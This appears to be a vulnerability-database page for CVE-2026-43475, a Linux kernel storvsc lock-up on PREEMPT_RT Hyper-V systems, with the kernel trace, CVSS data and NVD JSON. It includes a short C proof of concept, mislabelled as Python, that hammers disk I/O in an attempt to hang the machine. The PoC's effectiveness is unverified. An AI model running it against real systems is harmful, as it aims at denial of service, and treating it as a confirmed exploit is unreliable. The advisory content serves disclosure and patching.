CVE-2026-43475

Description

In the Linux kernel, the following vulnerability has been resolved: scsi: storvsc: Fix scheduling while atomic on PREEMPT_RT This resolves the follow splat and lock-up when running with PREEMPT_RT enabled on Hyper-V: [ 415.140818] BUG: scheduling while atomic: stress-ng-iomix/1048/0x00000002 [ 415.140822] INFO: lockdep is turned off. [ 415.140823] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec ghash_clmulni_intel aesni_intel rapl binfmt_misc nls_ascii nls_cp437 vfat fat snd_pcm hyperv_drm snd_timer drm_client_lib drm_shmem_helper snd sg soundcore drm_kms_helper pcspkr hv_balloon hv_utils evdev joydev drm configfs efi_pstore nfnetlink vsock_loopback vmw_vsock_virtio_transport_common hv_sock vmw_vsock_vmci_transport vsock vmw_vmci efivarfs autofs4 ext4 crc16 mbcache jbd2 sr_mod sd_mod cdrom hv_storvsc serio_raw hid_generic scsi_transport_fc hid_hyperv scsi_mod hid hv_netvsc hyperv_keyboard scsi_common [ 415.140846] Preemption disabled at: [ 415.140847] [<ffffffffc0656171>] storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140854] CPU: 8 UID: 0 PID: 1048 Comm: stress-ng-iomix Not tainted 6.19.0-rc7 #30 PREEMPT_{RT,(full)} [ 415.140856] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/04/2024 [ 415.140857] Call Trace: [ 415.140861] <TASK> [ 415.140861] ? storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140863] dump_stack_lvl+0x91/0xb0 [ 415.140870] __schedule_bug+0x9c/0xc0 [ 415.140875] __schedule+0xdf6/0x1300 [ 415.140877] ? rtlock_slowlock_locked+0x56c/0x1980 [ 415.140879] ? rcu_is_watching+0x12/0x60 [ 415.140883] schedule_rtlock+0x21/0x40 [ 415.140885] rtlock_slowlock_locked+0x502/0x1980 [ 415.140891] rt_spin_lock+0x89/0x1e0 [ 415.140893] hv_ringbuffer_write+0x87/0x2a0 [ 415.140899] vmbus_sendpacket_mpb_desc+0xb6/0xe0 [ 415.140900] ? rcu_is_watching+0x12/0x60 [ 415.140902] storvsc_queuecommand+0x669/0xbe0 [hv_storvsc] [ 415.140904] ? HARDIRQ_verbose+0x10/0x10 [ 415.140908] ? __rq_qos_issue+0x28/0x40 [ 415.140911] scsi_queue_rq+0x760/0xd80 [scsi_mod] [ 415.140926] __blk_mq_issue_directly+0x4a/0xc0 [ 415.140928] blk_mq_issue_direct+0x87/0x2b0 [ 415.140931] blk_mq_dispatch_queue_requests+0x120/0x440 [ 415.140933] blk_mq_flush_plug_list+0x7a/0x1a0 [ 415.140935] __blk_flush_plug+0xf4/0x150 [ 415.140940] __submit_bio+0x2b2/0x5c0 [ 415.140944] ? submit_bio_noacct_nocheck+0x272/0x360 [ 415.140946] submit_bio_noacct_nocheck+0x272/0x360 [ 415.140951] ext4_read_bh_lock+0x3e/0x60 [ext4] [ 415.140995] ext4_block_write_begin+0x396/0x650 [ext4] [ 415.141018] ? __pfx_ext4_da_get_block_prep+0x10/0x10 [ext4] [ 415.141038] ext4_da_write_begin+0x1c4/0x350 [ext4] [ 415.141060] generic_perform_write+0x14e/0x2c0 [ 415.141065] ext4_buffered_write_iter+0x6b/0x120 [ext4] [ 415.141083] vfs_write+0x2ca/0x570 [ 415.141087] ksys_write+0x76/0xf0 [ 415.141089] do_syscall_64+0x99/0x1490 [ 415.141093] ? rcu_is_watching+0x12/0x60 [ 415.141095] ? finish_task_switch.isra.0+0xdf/0x3d0 [ 415.141097] ? rcu_is_watching+0x12/0x60 [ 415.141098] ? lock_release+0x1f0/0x2a0 [ 415.141100] ? rcu_is_watching+0x12/0x60 [ 415.141101] ? finish_task_switch.isra.0+0xe4/0x3d0 [ 415.141103] ? rcu_is_watching+0x12/0x60 [ 415.141104] ? __schedule+0xb34/0x1300 [ 415.141106] ? hrtimer_try_to_cancel+0x1d/0x170 [ 415.141109] ? do_nanosleep+0x8b/0x160 [ 415.141111] ? hrtimer_nanosleep+0x89/0x100 [ 415.141114] ? __pfx_hrtimer_wakeup+0x10/0x10 [ 415.141116] ? xfd_validate_state+0x26/0x90 [ 415.141118] ? rcu_is_watching+0x12/0x60 [ 415.141120] ? do_syscall_64+0x1e0/0x1490 [ 415.141121] ? do_syscall_64+0x1e0/0x1490 [ 415.141123] ? rcu_is_watching+0x12/0x60 [ 415.141124] ? do_syscall_64+0x1e0/0x1490 [ 415.141125] ? do_syscall_64+0x1e0/0x1490 [ 415.141127] ? irqentry_exit+0x140/0 ---truncated---

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel 6.19-rc7

Linux Kernel (versions prior to fix commits in stable branches)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC: Simulate I/O mixing to stress the storvsc driver.
// Based on the 'stress-ng-iomix' trace in the vulnerability report.
// This code attempts to trigger the race condition on a vulnerable kernel.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define BUFFER_SIZE 4096

void trigger_io_stress(const char *filename) {
    int fd = open(filename, O_RDWR | O_CREAT | O_DIRECT, 0644);
    if (fd < 0) {
        // Fallback if O_DIRECT not supported (e.g. on some filesystems)
        fd = open(filename, O_RDWR | O_CREAT, 0644);
    }
    if (fd < 0) {
        perror("open");
        return;
    }

    char *buffer = aligned_alloc(BUFFER_SIZE, BUFFER_SIZE);
    if (!buffer) {
        perror("aligned_alloc");
        close(fd);
        return;
    }
    memset(buffer, 'A', BUFFER_SIZE);

    // Perform mixed I/O operations similar to stress-ng
    for (int i = 0; i < 100000; i++) {
        pwrite(fd, buffer, BUFFER_SIZE, (rand() % 1000) * BUFFER_SIZE);
        pread(fd, buffer, BUFFER_SIZE, (rand() % 1000) * BUFFER_SIZE);
        fsync(fd);
    }

    free(buffer);
    close(fd);
}

int main() {
    printf("Starting I/O stress to potentially trigger CVE-2026-43475...\n");
    // Create a temporary file to perform operations on
    trigger_io_stress("/tmp/test_storvsc_poc.dat");
    printf("I/O stress completed.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43475
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43475
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43475/
[4] VulDB https://vuldb.com/cve/CVE-2026-43475
[5] https://git.kernel.org/stable/c/57297736c08233987e5d29ce6584c6ca2a831b12
[6] https://git.kernel.org/stable/c/91ab59f76d0866079420ebff1c7959fcd87a242e
[7] https://git.kernel.org/stable/c/b82462af23e45e066dd56d2736ea70159a6ad647
[8] https://git.kernel.org/stable/c/c2e73d8acd056347a70047e6be7cd98e0e811dfa
[9] https://git.kernel.org/stable/c/c7984d196476adcbd51c0ce386d7e90277198d57
[10] https://git.kernel.org/stable/c/cf00cb15f2515e38d3b7571bf6800b7c6ce70a84
[11] https://git.kernel.org/stable/c/e7919a293f9b6101e38bde0d8613daea6c9955df
[12] https://git.kernel.org/stable/c/f8db760f4f52a73a022a3d6c84c488ead952a9b5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43475", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:17:00.687", "lastModified": "2026-05-21T14:58:56.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: storvsc: Fix scheduling while atomic on PREEMPT_RT\n\nThis resolves the follow splat and lock-up when running with PREEMPT_RT\nenabled on Hyper-V:\n\n[ 415.140818] BUG: scheduling while atomic: stress-ng-iomix/1048/0x00000002\n[ 415.140822] INFO: lockdep is turned off.\n[ 415.140823] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec ghash_clmulni_intel aesni_intel rapl binfmt_misc nls_ascii nls_cp437 vfat fat snd_pcm hyperv_drm snd_timer drm_client_lib drm_shmem_helper snd sg soundcore drm_kms_helper pcspkr hv_balloon hv_utils evdev joydev drm configfs efi_pstore nfnetlink vsock_loopback vmw_vsock_virtio_transport_common hv_sock vmw_vsock_vmci_transport vsock vmw_vmci efivarfs autofs4 ext4 crc16 mbcache jbd2 sr_mod sd_mod cdrom hv_storvsc serio_raw hid_generic scsi_transport_fc hid_hyperv scsi_mod hid hv_netvsc hyperv_keyboard scsi_common\n[ 415.140846] Preemption disabled at:\n[ 415.140847] [<ffffffffc0656171>] storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc]\n[ 415.140854] CPU: 8 UID: 0 PID: 1048 Comm: stress-ng-iomix Not tainted 6.19.0-rc7 #30 PREEMPT_{RT,(full)}\n[ 415.140856] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/04/2024\n[ 415.140857] Call Trace:\n[ 415.140861] <TASK>\n[ 415.140861] ? storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc]\n[ 415.140863] dump_stack_lvl+0x91/0xb0\n[ 415.140870] __schedule_bug+0x9c/0xc0\n[ 415.140875] __schedule+0xdf6/0x1300\n[ 415.140877] ? rtlock_slowlock_locked+0x56c/0x1980\n[ 415.140879] ? rcu_is_watching+0x12/0x60\n[ 415.140883] schedule_rtlock+0x21/0x40\n[ 415.140885] rtlock_slowlock_locked+0x502/0x1980\n[ 415.140891] rt_spin_lock+0x89/0x1e0\n[ 415.140893] hv_ringbuffer_write+0x87/0x2a0\n[ 415.140899] vmbus_sendpacket_mpb_desc+0xb6/0xe0\n[ 415.140900] ? rcu_is_watching+0x12/0x60\n[ 415.140902] storvsc_queuecommand+0x669/0xbe0 [hv_storvsc]\n[ 415.140904] ? HARDIRQ_verbose+0x10/0x10\n[ 415.140908] ? __rq_qos_issue+0x28/0x40\n[ 415.140911] scsi_queue_rq+0x760/0xd80 [scsi_mod]\n[ 415.140926] __blk_mq_issue_directly+0x4a/0xc0\n[ 415.140928] blk_mq_issue_direct+0x87/0x2b0\n[ 415.140931] blk_mq_dispatch_queue_requests+0x120/0x440\n[ 415.140933] blk_mq_flush_plug_list+0x7a/0x1a0\n[ 415.140935] __blk_flush_plug+0xf4/0x150\n[ 415.140940] __submit_bio+0x2b2/0x5c0\n[ 415.140944] ? submit_bio_noacct_nocheck+0x272/0x360\n[ 415.140946] submit_bio_noacct_nocheck+0x272/0x360\n[ 415.140951] ext4_read_bh_lock+0x3e/0x60 [ext4]\n[ 415.140995] ext4_block_write_begin+0x396/0x650 [ext4]\n[ 415.141018] ? __pfx_ext4_da_get_block_prep+0x10/0x10 [ext4]\n[ 415.141038] ext4_da_write_begin+0x1c4/0x350 [ext4]\n[ 415.141060] generic_perform_write+0x14e/0x2c0\n[ 415.141065] ext4_buffered_write_iter+0x6b/0x120 [ext4]\n[ 415.141083] vfs_write+0x2ca/0x570\n[ 415.141087] ksys_write+0x76/0xf0\n[ 415.141089] do_syscall_64+0x99/0x1490\n[ 415.141093] ? rcu_is_watching+0x12/0x60\n[ 415.141095] ? finish_task_switch.isra.0+0xdf/0x3d0\n[ 415.141097] ? rcu_is_watching+0x12/0x60\n[ 415.141098] ? lock_release+0x1f0/0x2a0\n[ 415.141100] ? rcu_is_watching+0x12/0x60\n[ 415.141101] ? finish_task_switch.isra.0+0xe4/0x3d0\n[ 415.141103] ? rcu_is_watching+0x12/0x60\n[ 415.141104] ? __schedule+0xb34/0x1300\n[ 415.141106] ? hrtimer_try_to_cancel+0x1d/0x170\n[ 415.141109] ? do_nanosleep+0x8b/0x160\n[ 415.141111] ? hrtimer_nanosleep+0x89/0x100\n[ 415.141114] ? __pfx_hrtimer_wakeup+0x10/0x10\n[ 415.141116] ? xfd_validate_state+0x26/0x90\n[ 415.141118] ? rcu_is_watching+0x12/0x60\n[ 415.141120] ? do_syscall_64+0x1e0/0x1490\n[ 415.141121] ? do_syscall_64+0x1e0/0x1490\n[ 415.141123] ? rcu_is_watching+0x12/0x60\n[ 415.141124] ? do_syscall_64+0x1e0/0x1490\n[ 415.141125] ? do_syscall_64+0x1e0/0x1490\n[ 415.141127] ? irqentry_exit+0x140/0\n---truncated---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": ... (truncated)